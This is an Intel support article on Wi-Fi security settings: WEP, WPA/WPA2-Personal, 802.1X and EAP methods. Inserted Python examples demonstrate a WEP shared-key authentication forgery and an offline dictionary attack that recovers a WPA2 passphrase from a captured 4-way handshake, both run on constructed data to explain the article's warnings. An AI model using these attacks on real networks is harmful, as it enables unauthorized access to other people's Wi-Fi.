Wi-Fi Security Overview

Protecting your Wi-Fi network

Your wireless network, if left unprotected, can be joined, and its traffic read, by anyone within radio range. The security methods described in this article let you protect a home or small business network against most forms of unauthorized access. They are not all equally strong: SSID hiding, WEP and shared-key authentication are described so that you can recognize them, but WPA2-Personal (home) or WPA2-Enterprise with 802.1X (business) is what you should actually deploy.

  • Authentication
    • Authentication is the process of identifying and approving a request from a client (the supplicant, usually a laptop) to access a network at a network access point. Once authentication completes and access is granted, the client can use the network. IEEE 802.11 authentication is not to be confused with IEEE 802.1X link-layer authentication of users. 802.11 authentication and association take place at the access point (AP) or broadband wireless router before any upper-layer authentication (802.1X), which relies on back-end authentication servers (typically RADIUS) to identify individual users by various credential types.
    • 802.11 authentication requires that a station (mobile device) complete an authentication exchange with the AP before it can associate and send data frames. This exchange happens every time a station connects, but by itself it provides no security: in Open System mode the AP accepts every request. It is also not mutual, meaning only the AP "authenticates" the station and not vice versa, and no data encryption happens at this level. Real protection comes from the key management and encryption negotiated after association (WPA/WPA2) or from 802.1X.
  • Encryption
    • You can select encryption algorithms to encrypt the data sent across your wireless network. Only devices that hold the correct key can decrypt the data being transmitted; for WPA-Personal and WPA2-Personal this is a pre-shared key derived from the network passphrase.
    • WEP keys come in two lengths, 64-bit and 128-bit. The 128-bit key is the stronger of the two, but neither protects against the known attacks on WEP (see the WEP section below), so treat this choice as legacy only and prefer WPA2 with AES-CCMP, which always uses a 128-bit key.
  • SSID Broadcasting
    • Some guides suggest setting the access point not to broadcast the Service Set Identifier (SSID). This does not keep the network private: the SSID is still sent in cleartext in probe requests and responses and in every association request, so anyone with a wireless sniffer learns it as soon as a legitimate client connects, and hiding it forces your clients to probe for the network by name wherever they go. (This setting is made at the access point, not at the adapter with the Intel® PROSet/Wireless WiFi Connection Utility.) SSID hiding is not secure and is not a recommended way of securing your wireless network.

Personal security methods

Open and shared network authentication
IEEE 802.11 supports two types of network authentication methods: Open System and Shared Key.

  • When open authentication is used, any wireless station can request authentication. The station that needs to authenticate with another wireless station sends an authentication management request that has the identity of the sending station. The receiving station or access point grants any request for authentication. Open authentication allows any device to gain network access. If no encryption is enabled on the network, any device that knows the Service Set Identifier (SSID) of the access point can gain access to the network.
  • When shared key authentication is used, each wireless station is assumed to have received a secret shared key over a secure channel that is independent of the 802.11 wireless channel. You can distribute this secret key over a wired Ethernet connection, or physically on a USB memory stick or CD. Shared key authentication requires that the client configure a static WEP key, and access is granted only if the client answers a challenge correctly: the AP sends a 128-byte challenge in cleartext and the client returns it WEP-encrypted. Because an eavesdropper sees both the challenge and its encrypted form, one observed exchange reveals the RC4 keystream for that IV, which is enough to answer any later challenge without the key. Shared key authentication is therefore weaker than open authentication with the same WEP key, and both should be replaced by WPA2.

WEP

  • Wired Equivalent Privacy (WEP) uses encryption to help prevent unauthorized reception of wireless data.
  • WEP uses an encryption key to encrypt data before transmitting it. Only computers that use the same encryption key can access the network and decrypt the data transmitted by other computers.
  • WEP encryption provides for two levels of security, using a 64-bit key (sometimes referred to as 40-bit) or a 128-bit key (also known as 104-bit). For stronger security, you should use a 128-bit key. If you use encryption, all wireless devices on your wireless network must use the same encryption keys.
  • With WEP data encryption, a wireless station can be configured with up to four keys (the key index values are 1, 2, 3, and 4).
  • When an access point (AP) or a wireless station transmits an encrypted message that uses a key stored in a specific key index, the transmitted message indicates the key index that was used to encrypt the message body.
  • The receiving AP or wireless station can then retrieve the key that is stored at the key index and use it to decode the encrypted message body.
  • WEP is broken, not merely weak: its RC4 key scheduling and short, reused 24-bit IVs allow the key itself to be recovered from passively captured traffic with freely available tools, and its CRC-32 integrity check lets an attacker modify encrypted frames without detection. Do not use WEP; use WPA2-Personal with AES-CCMP (or WPA-Personal only where WPA2 is unavailable).
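As an added example (not part of the original article), the following Python script models WEP encryption and the shared-key handshake described above, and shows why shared-key authentication is weaker than open authentication with the same WEP key: one observed challenge/response pair yields the RC4 keystream for that IV, which is enough to pass any later challenge without knowing the key. The WEP key, the station names and the challenges are constructed for the demonstration; the RC4 and WEP framing follow the standard.

```python
import os
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """WEP frame body: (data || ICV) XOR RC4(IV || key)."""
    plaintext = data + icv(data)
    return xor(plaintext, rc4(iv + key, len(plaintext)))


def wep_decrypt(key: bytes, iv: bytes, body: bytes):
    """Return the plaintext data, or None if the ICV does not match."""
    plaintext = xor(body, rc4(iv + key, len(body)))
    data, tag = plaintext[:-4], plaintext[-4:]
    return data if icv(data) == tag else None


class AccessPoint:
    """Minimal model of an AP doing 802.11 Shared Key authentication."""

    def __init__(self, key: bytes):
        self.key = key
        self.pending = {}

    def challenge(self, station: str) -> bytes:
        # Authentication frame seq 2: a 128-byte challenge sent in cleartext.
        text = os.urandom(128)
        self.pending[station] = text
        return text

    def verify(self, station: str, iv: bytes, body: bytes) -> bool:
        # Authentication frame seq 3: the AP decrypts with whatever IV the station chose.
        expected = self.pending.pop(station)
        return wep_decrypt(self.key, iv, body) == expected


def station_response(key: bytes, challenge: bytes):
    """A legitimate station encrypts the challenge under a fresh IV."""
    iv = os.urandom(3)
    return iv, wep_encrypt(key, iv, challenge)


def recover_keystream(challenge: bytes, body: bytes) -> bytes:
    """Eavesdropper: (challenge || ICV) XOR ciphertext = keystream for that IV."""
    return xor(challenge + icv(challenge), body)


def forge_response(keystream: bytes, challenge: bytes) -> bytes:
    """Attacker answers a new challenge by reusing the recovered keystream."""
    return xor(challenge + icv(challenge), keystream)


def demo() -> bool:
    key = bytes.fromhex("0123456789abcdef0123456789")  # constructed 104-bit WEP key
    ap = AccessPoint(key)

    # 1. A legitimate station authenticates; the attacker records iv, challenge and response.
    challenge = ap.challenge("laptop")
    iv, body = station_response(key, challenge)
    if not ap.verify("laptop", iv, body):
        raise RuntimeError("legitimate authentication failed")

    # 2. The keystream for this IV falls out of the observed pair.
    keystream = recover_keystream(challenge, body)

    # 3. The attacker authenticates with the same IV and no knowledge of the key.
    new_challenge = ap.challenge("attacker")
    return ap.verify("attacker", iv, forge_response(keystream, new_challenge))


if __name__ == "__main__":
    print("forged authentication accepted:", demo())
```

The same keystream also lets the attacker inject a valid data frame under that IV, because the CRC-32 ICV is computed over plaintext the attacker chooses; nothing in WEP ties the IV to a particular station or forbids reuse.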

WPA-Personal

  • WPA-Personal mode is targeted to home and small business environments.
  • WPA Personal requires manual configuration of a pre-shared key (PSK) on the access point and clients. No authentication server is needed.
  • The same password entered at the access point needs to be used on the connecting computer and all other wireless devices that access the wireless network.
  • Security depends on the strength and secrecy of the passphrase. The pre-shared key is derived from the passphrase and the SSID, and anyone who captures the 4-way handshake of a connecting client can test passphrase guesses offline at high speed, so use a long, random passphrase rather than a word or a short phrase; the longer and less predictable it is, the stronger the security of the wireless network.
  • If your wireless access point or router supports both WPA-Personal and WPA2-Personal, enable WPA2-Personal with AES-CCMP on the access point and provide a long, strong passphrase.
  • WPA-Personal is compatible with the TKIP and AES-CCMP data encryption algorithms. TKIP was designed as a stopgap for WEP-era hardware and is deprecated; use it only for devices that cannot do AES-CCMP.

WPA2-Personal

  • WPA2-Personal requires manual configuration of a pre-shared key (PSK) on the access point and clients. No authentication server is needed.
  • The same password entered at the access point needs to be used on the connecting computer and all other wireless devices that access the wireless network.
  • Security depends on the strength and secrecy of the passphrase, exactly as for WPA-Personal: the pre-shared key is derived from the passphrase and the SSID, and a captured 4-way handshake lets an attacker test guesses offline, so use a long, random passphrase. The longer and less predictable it is, the stronger the security of the wireless network.
  • WPA2 is an improvement over WPA and implements the full IEEE 802.11i standard. WPA2 is backward compatible with WPA.
  • WPA2-Personal is compatible with the TKIP and AES-CCMP data encryption algorithms. AES-CCMP is mandatory in WPA2 and is the one to configure; TKIP is allowed only for legacy clients, and in mixed TKIP/AES mode the group (broadcast) key for the whole network falls back to TKIP.
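The passphrase warnings in the WPA-Personal and WPA2-Personal sections above are best understood from the key derivation itself. The following Python script is an added example, not code from the original article or from Intel: it derives the PSK from passphrase and SSID, derives the session keys (PTK) the way the 4-way handshake does, and then plays the attacker, recovering the passphrase from a captured handshake message 2 by offline guessing. The SSID, MAC addresses, nonces, passphrase and word list are constructed for the demonstration; the derivations follow IEEE 802.11i for WPA2 with CCMP.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter, concatenated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key from the 4-way handshake inputs (AP MAC, station MAC, both nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """EAPOL-Key MIC for WPA2/CCMP (key descriptor version 2): HMAC-SHA1 truncated to 16 bytes,
    computed over the whole EAPOL frame with its MIC field (bytes 81..96) zeroed."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (station -> AP): carries SNonce and the MIC."""
    body = (
        struct.pack(">BHH", 2, 0x010A, 0)  # descriptor type RSN; key info: version 2, pairwise, MIC; key length
        + struct.pack(">Q", 1)             # replay counter
        + snonce
        + b"\x00" * 16                     # key IV
        + b"\x00" * 8                      # key RSC
        + b"\x00" * 8                      # key ID
        + mic
        + struct.pack(">H", 0)             # key data length
    )
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL version 2, type 3 (Key)


def crack_handshake(ssid, aa, spa, anonce, snonce, msg2, candidates):
    """Offline guessing: return the candidate passphrase whose KCK reproduces the captured MIC."""
    captured_mic = msg2[81:97]
    for passphrase in candidates:
        ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), captured_mic):  # KCK = PTK[0:16]
            return passphrase
    return None


# Constructed handshake parameters for the demonstration (not captured traffic).
SSID = "HomeNet"
AA = bytes.fromhex("001122334455")       # AP MAC address
SPA = bytes.fromhex("66778899aabb")      # station MAC address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "correct horse battery"


def make_capture() -> bytes:
    """What a sniffer would see: message 2 carrying a valid MIC under the real passphrase."""
    ptk = derive_ptk(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    return build_msg2(SNONCE, eapol_mic(ptk[:16], build_msg2(SNONCE)))


def demo():
    wordlist = ["password", "12345678", "letmein123", "correct horse battery"]
    return crack_handshake(SSID, AA, SPA, ANONCE, SNONCE, make_capture(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Every guess costs 4096 PBKDF2 rounds, which is deliberate, but that only slows a dictionary attack by a constant factor; the defence is a passphrase that is not in any dictionary, which is why the sections above insist on length and randomness rather than on key-length settings.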

802.1X authentication (enterprise security)

Overview
The 802.1X authentication is independent of the 802.11 authentication process. IEEE 802.1X, together with the Extensible Authentication Protocol (EAP), provides a framework into which different authentication methods plug, and IEEE 802.11i defines the key management that follows. There are different 802.1X authentication types and each takes a different approach to authentication, but all use the same 802.11 protocols and framework for communication between a client and an access point.

In most EAP methods, the client and the authentication server each derive a master key (the PMK) from the completed EAP exchange. The server passes it to the access point in the RADIUS Access-Accept, and the client and access point then derive the per-session data encryption keys from it in the 4-way handshake.

With 802.1X authentication, an authentication method runs between the client and a server; for example, a Remote Authentication Dial-In User Service (RADIUS) server that the access point forwards to. The access point relays the EAP exchange without interpreting it. The process uses credentials, such as a user's password or certificate, that are never sent in cleartext over the wireless link.

Most 802.1X types support dynamic per-user, per-session keys to strengthen the key security. The 802.1X authentication benefits from the use of an existing authentication protocol known as the Extensible Authentication Protocol (EAP).

The 802.1X authentication for wireless networks has three main components:

  • The authenticator (the access point)
  • The supplicant (the client software)
  • The authentication server

The 802.1X authentication security initiates an authorization request from the wireless client to the access point, which authenticates the client to an Extensible Authentication Protocol (EAP) compliant RADIUS server. This RADIUS server can authenticate either the user (via passwords or certificates) or the system (by MAC address). MAC-address authentication is a fallback for devices that cannot run a supplicant, not an EAP method, and because MAC addresses are trivially spoofed it should not be relied on for security.

Until the exchange completes, the access point's controlled port passes only EAPOL frames, so the client cannot send ordinary traffic. Not all authentication methods use a RADIUS server. WPA-Personal and WPA2-Personal use a common passphrase that must be entered at the access point and at all devices requesting access to the network.

Several EAP authentication methods are used with 802.1X. Those supported by the PROSet utility, grouped by the vendor with which each is associated, are:

  • Microsoft:
    • PEAP – MSCHAPV2
    • TLS
    • PEAP-TLS
  • Cisco:
    • LEAP
    • PEAP-GTC
    • EAP-FAST
  • Intel:
    • TTLS
    • EAP-SIM
    • EAP-AKA

These are all methods for the wireless client to identify itself to the RADIUS server. With RADIUS authentication, user identities are checked against databases. RADIUS constitutes a set of standards that addresses Authentication, Authorization, and Accounting (AAA).

How 802.1X authentication works
Following is a simplified description of how 802.1X authentication works.

  1. A client sends an EAPOL-Start message to the access point (or the access point, on seeing the client associate, sends an EAP-Request/Identity). The access point requests the identity of the client.
  2. The client replies with an EAP-Response/Identity, which the access point wraps in a RADIUS Access-Request and forwards to the authentication server. This outer identity crosses the air in cleartext, which is why tunneled methods (PEAP, TTLS, EAP-FAST) should be configured with an anonymous outer identity.
  3. The server and the client run the chosen EAP method, possibly over several request/response rounds, which the access point relays without interpreting. If the client does not support the method offered, it answers with an EAP Nak listing the methods it does support.
  4. On success the server returns a RADIUS Access-Accept carrying an EAP-Success and the master key (PMK); on failure it returns an Access-Reject and EAP-Failure.
  5. The access point puts the client port in the authorized state, completes the 4-way handshake with the client to derive the session keys, and data traffic is allowed to proceed.
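As an added example (not part of the original article), the following Python script decodes the EAPOL/EAP frames that carry the exchange above and audits what an eavesdropper learns from the part that is never encrypted: the outer identity and the method negotiation. The exchange it parses is constructed, not captured, and the audit rules are illustrative.

```python
import struct

EAPOL_TYPES = {0: "EAP-Packet", 1: "EAPOL-Start", 2: "EAPOL-Logoff", 3: "EAPOL-Key"}
EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
EAP_METHODS = {
    1: "Identity", 2: "Notification", 3: "Nak", 6: "GTC", 13: "EAP-TLS", 17: "LEAP",
    18: "EAP-SIM", 21: "EAP-TTLS", 23: "EAP-AKA", 25: "PEAP", 26: "EAP-MSCHAPv2", 43: "EAP-FAST",
}


def build_eapol(eapol_type: int, eap: bytes = b"") -> bytes:
    """EAPOL header (version 2, type, body length) in front of an optional EAP packet."""
    return struct.pack(">BBH", 2, eapol_type, len(eap)) + eap


def build_eap(code: int, ident: int, method: int = None, data: bytes = b"") -> bytes:
    """EAP packet: code, identifier, length, then type and type-data for Request/Response."""
    payload = b"" if method is None else bytes([method]) + data
    return struct.pack(">BBH", code, ident, 4 + len(payload)) + payload


def parse_eapol(frame: bytes) -> dict:
    """Decode one EAPOL frame; for EAP packets also decode code, id, method, identity or Nak list."""
    version, eapol_type, length = struct.unpack(">BBH", frame[:4])
    rec = {"eapol_version": version, "eapol_type": EAPOL_TYPES.get(eapol_type, eapol_type)}
    if eapol_type != 0:
        return rec
    body = frame[4:4 + length]
    code, ident, eap_len = struct.unpack(">BBH", body[:4])
    rec.update(code=EAP_CODES.get(code, code), id=ident)
    if code in (1, 2) and eap_len > 4:
        method = body[4]
        data = body[5:eap_len]
        rec["method"] = EAP_METHODS.get(method, method)
        if method == 1:
            rec["identity"] = data.decode("utf-8", "replace")
        elif method == 3:
            rec["nak_wants"] = [EAP_METHODS.get(b, b) for b in data]
    return rec


def audit(frames) -> list:
    """Flag what an eavesdropper learns from the unencrypted start of an 802.1X exchange."""
    findings = []
    for rec in map(parse_eapol, frames):
        if rec.get("code") == "Response" and rec.get("method") == "Identity":
            user = rec["identity"].split("@")[0]
            if user and user.lower() != "anonymous":
                findings.append("cleartext outer identity: " + rec["identity"])
        if rec.get("code") == "Request" and rec.get("method") == "LEAP":
            findings.append("authenticator offered LEAP")
        if rec.get("method") == "Nak":
            findings.append("client refused method, wants " + ", ".join(map(str, rec["nak_wants"])))
    return findings


# Constructed exchange (not captured traffic): the supplicant starts, discloses its real
# identity, refuses LEAP in favour of PEAP, and is accepted.
SAMPLE_EXCHANGE = [
    build_eapol(1),                                              # EAPOL-Start
    build_eapol(0, build_eap(1, 1, 1)),                         # Request/Identity
    build_eapol(0, build_eap(2, 1, 1, b"alice@corp.example")),  # Response/Identity (cleartext)
    build_eapol(0, build_eap(1, 2, 17)),                        # Request/LEAP offered by server
    build_eapol(0, build_eap(2, 2, 3, bytes([25]))),            # Response/Nak: client wants PEAP
    build_eapol(0, build_eap(1, 3, 25, b"\x20")),               # Request/PEAP with the Start flag
    build_eapol(0, build_eap(3, 3)),                            # Success
]


def demo() -> list:
    return audit(SAMPLE_EXCHANGE)


if __name__ == "__main__":
    for frame in SAMPLE_EXCHANGE:
        print(parse_eapol(frame))
    print(demo())
```

On real captures the parser would be fed the payload that follows the 802.11 and LLC/SNAP headers (EtherType 0x888E); everything up to the EAP-Success, apart from what the chosen method tunnels, is visible to anyone in range, which is the point of the anonymous outer identity.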

802.1X features
The following 802.1X features are supported on Microsoft Windows XP*:

  • 802.1X supplicant protocol support.
  • Support for the Extensible Authentication Protocol (EAP).

For Microsoft Windows Vista* and Microsoft Windows 7*, Microsoft’s native supplicant is used to do EAP operations as opposed to Microsoft Windows XP* where the Intel® PROSet/Wireless client utility runs the supplicant state machine for EAPOL.

Supported Authentication Methods on Microsoft Windows XP* and higher:

  • EAP TLS.
  • EAP Tunneled TLS (TTLS).
  • Cisco LEAP.
  • PEAP.
  • EAP-SIM.
  • EAP-FAST.
  • EAP-AKA.

Network authentication

  • Open
  • Shared
  • WPA-Personal
  • WPA2-Personal
  • WPA Enterprise
  • WPA2 Enterprise

WPA Enterprise and WPA2 Enterprise verify network users through a RADIUS or other authentication server. They use 128-bit encryption keys and dynamic per-session keys to protect your wireless network's privacy and enterprise security. An authentication type is selected to match the authentication protocol of the 802.1X server.

Data encryption

  • AES-CCMP
    Advanced Encryption Standard - Counter Mode with CBC-MAC Protocol. This is the method for privacy protection of wireless transmissions specified in the IEEE 802.11i standard. AES-CCMP provides a stronger encryption method than TKIP. Choose AES-CCMP as the data encryption method whenever the hardware supports it. AES-CCMP is available with WPA/WPA2 Personal/Enterprise network authentication.
    Note Some security solutions are not supported by your computer operating system and can require other software or hardware, and wireless LAN infrastructure support.
  • TKIP
    Temporal Key Integrity Protocol provides per-packet key mixing, a message integrity check (Michael), and a rekeying mechanism. It was designed to run on WEP-era RC4 hardware and is deprecated in favor of AES-CCMP. TKIP is available with WPA/WPA2 Personal/Enterprise network authentication.
  • CKIP
    Cisco Key Integrity Protocol (CKIP) is Cisco proprietary security protocol for encryption in 802.11 media. CKIP uses the following features to improve 802.11 security in infrastructure mode:
    • Key Permutation (KP)
    • Message Sequence Number
    NOTE CKIP is not used with WPA/WPA2 Personal/Enterprise network authentication.
    NOTE CKIP is only supported through the use of the WiFi connection utility on Windows* XP.
  • WEP
    Wired Equivalent Privacy is part of the original 802.11 standard and a broken security protocol which uses static keys that are 10 or 26 hexadecimal digits long (40 or 104 bits, combined with a 24-bit IV). It uses the stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity, and the key can be recovered from captured traffic.

Authentication types

  • TLS
    A type of authentication method using the Extensible Authentication Protocol (EAP) and the Transport Layer Security (TLS) protocol. EAP-TLS uses X.509 certificates on both the client and the server, so no password crosses the network; the client's private key may be protected locally by a password or held on a smart card. EAP-TLS authentication supports dynamic key management (historically dynamic WEP keys, today the PMK used by WPA/WPA2). The TLS protocol is intended to secure and authenticate communications across a public network through data encryption. The TLS Handshake Protocol allows the server and client to provide mutual authentication and to negotiate an encryption algorithm and cryptographic keys before data is transmitted.
  • TTLS
    In TTLS (Tunneled Transport Layer Security), the client uses TLS to validate the server's certificate and create a TLS-encrypted channel between the client and server; the client itself needs no certificate. Inside the tunnel the client can use another authentication protocol, typically a password-based challenge/response that would be unsafe to expose on the air. TTLS implementations today support all methods defined by EAP and several older methods (PAP, CHAP, MS-CHAP and MS-CHAP-V2), and TTLS can be extended to new protocols by defining new attributes. The tunnel protects the inner credentials only if the client actually validates the server certificate (trusted issuing CA and expected server name); a client configured to skip validation will hand its password to any rogue access point that presents a certificate.
  • PEAP
    PEAP is an Extensible Authentication Protocol (EAP) IEEE 802.1X authentication type designed to take advantage of server-side EAP-Transport Layer Security (EAP-TLS) and to support various inner authentication methods, including users' passwords, one-time passwords, and Generic Token Cards. As with TTLS, the client must validate the server certificate, and the inner user name is hidden only if an anonymous outer identity is configured.
  • LEAP
    Lightweight Extensible Authentication Protocol (LEAP) is a proprietary extensible authentication protocol developed by Cisco that provides a challenge-response authentication mechanism and dynamic key assignment. When a wireless access point communicates with a Cisco LEAP-enabled RADIUS server (Cisco Secure Access Control Server [ACS]), Cisco LEAP provides access control through mutual authentication between client WiFi adapters and the wireless networks and provides dynamic, individual user encryption keys to help protect the privacy of transmitted data. LEAP's challenge/response is based on MS-CHAP and is not tunneled, so a captured exchange can be subjected to an offline dictionary attack on the user's password; Cisco itself recommends migrating LEAP deployments to EAP-FAST.
  • EAP-SIM
    Extensible Authentication Protocol Method for GSM Subscriber Identity (EAP-SIM) is a mechanism for authentication and session key distribution. It uses the Global System for Mobile Communications (GSM) Subscriber Identity Module (SIM). EAP-SIM uses a dynamic session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt data. EAP-SIM requires you to enter a user verification code, or PIN, for communication with the Subscriber Identity Module (SIM) card. A SIM card is a special smart card that is used by Global System for Mobile Communications (GSM) based digital cellular networks.
  • EAP-AKA
    EAP-AKA (Extensible Authentication Protocol Method for UMTS Authentication and Key Agreement) is an EAP mechanism for authentication and session key distribution, using the Universal Mobile Telecommunications System (UMTS) Subscriber Identity Module (USIM). The USIM card is a special smart card used with cellular networks to validate a given user with the network.

EAP-FAST

  • EAP-FAST, like EAP-TTLS and PEAP, uses tunneling to protect traffic. The main difference is that EAP-FAST does not use certificates to authenticate. Provisioning in EAP-FAST is negotiated solely by the client as the first communication exchange when EAP-FAST is requested from the server. If the client does not have a pre-shared secret Protected Access Credential (PAC), it is able to initiate a provisioning EAP-FAST exchange to dynamically obtain one from the server.
  • EAP-FAST documents two methods to deliver the PAC: manual delivery through an out-of-band secure mechanism and automatic provisioning.
  • Manual delivery mechanisms are any delivery mechanism that the administrator of the network considers sufficiently secure.
  • Automatic (in-band) provisioning establishes an encrypted tunnel to protect the authentication of the client and the delivery of the PAC. In its anonymous form the tunnel does not authenticate the server, so during this one-time phase the client cannot distinguish the real server from a rogue one; this is why it is less secure than manual delivery, though still more secure than the unprotected exchange used in LEAP. Where possible, use authenticated provisioning (server certificate) or deliver PACs manually.
  • The EAP-FAST method is divided into two parts: provisioning and authentication. The provisioning phase involves the initial delivery of the PAC to the client. This phase only needs to be performed once per client and user.

Authentication protocols

  • PAP
    Password Authentication Protocol is a two-way handshake protocol designed for use with PPP. PAP sends the password in the clear, so it is not secure on its own; inside TTLS it is protected only by the TLS tunnel and therefore depends entirely on the client validating the server certificate. This is only available for the TTLS authentication type.
  • CHAP
    Challenge Handshake Authentication Protocol is a three-way handshake protocol that is considered more secure than Password Authentication Protocol. This is only available for TTLS authentication Type.
  • MS-CHAP (MD4)
    This uses Microsoft's challenge-and-reply protocol based on the MD4 hash of the password (the NT hash). It only works with Microsoft systems. On PPP links it also enables data encryption (MPPE); inside TTLS the TLS tunnel already provides that. This is only available for the TTLS authentication type.
  • MS-CHAP-V2
    This introduces an additional feature not available with MS-CHAP-V1 or standard CHAP authentication: the change password feature. This feature allows the client to change the account password if the RADIUS server reports that the password has expired. This is available for TTLS and PEAP authentication types. MS-CHAP-V2's challenge/response rests on DES and the NT password hash and is weak on its own, so it must only ever be run inside a TLS tunnel, never as a bare method on the air.
  • Generic Token Card (GTC)
    Generic Token Card (RFC 3748) is a simple challenge/response carrier for one-time passwords and hardware token codes: the server sends a text challenge and the client returns the user's response as plain text. Because it has no protection of its own, it is used inside the PEAP tunnel, which encrypts the exchange and, when an anonymous outer identity is configured, hides the inner user name until the TLS tunnel is established. It is only available for the PEAP authentication type.
  • TLS
    The TLS protocol is intended to secure and authenticate communications across a public network through data encryption. The TLS Handshake Protocol allows the server and client to provide mutual authentication and to negotiate an encryption algorithm and cryptographic keys before data is transmitted. Only available for PEAP authentication type.

This applies to:

Intel® Centrino® Advanced-N + WiMAX 6250
Intel® Centrino® Advanced-N 6200
Intel® Centrino® Advanced-N 6205
Intel® Centrino® Advanced-N 6205 For Desktop
Intel® Centrino® Advanced-N 6230
Intel® Centrino® Advanced-N 6235
Intel® Centrino® Ultimate-N 6300
Intel® Centrino® Wireless-N + WiMAX 6150
Intel® Centrino® Wireless-N 100
Intel® Centrino® Wireless-N 1000
Intel® Centrino® Wireless-N 1030
Intel® Centrino® Wireless-N 105
Intel® Centrino® Wireless-N 130
Intel® Centrino® Wireless-N 135
Intel® Centrino® Wireless-N 2200
Intel® Centrino® Wireless-N 2200 For Desktop
Intel® Centrino® Wireless-N 2230
Intel® Dual Band Wireless-AC 3160
Intel® Dual Band Wireless-AC 7260
Intel® Dual Band Wireless-AC 7260 for Desktop
Intel® Dual Band Wireless-AC 7265
Intel® Dual Band Wireless-N 7260
Intel® Dual Band Wireless-N 7265
Intel® PRO/Wireless 3945ABG Network Connection
Intel® WiFi Link 1000
Intel® WiFi Link 5300 and Intel® WiFi Link 5100 products
Intel® WiMAX/WiFi Link 5350 and Intel® WiMAX/WiFi Link 5150 products
Intel® Wireless WiFi Link 4965AGN
Intel® Wireless-N 7260
Intel® Wireless-N 7265

Solution ID: CS-032784
Last Modified: 29-Oct-2014
Date Created: 18-Sep-2011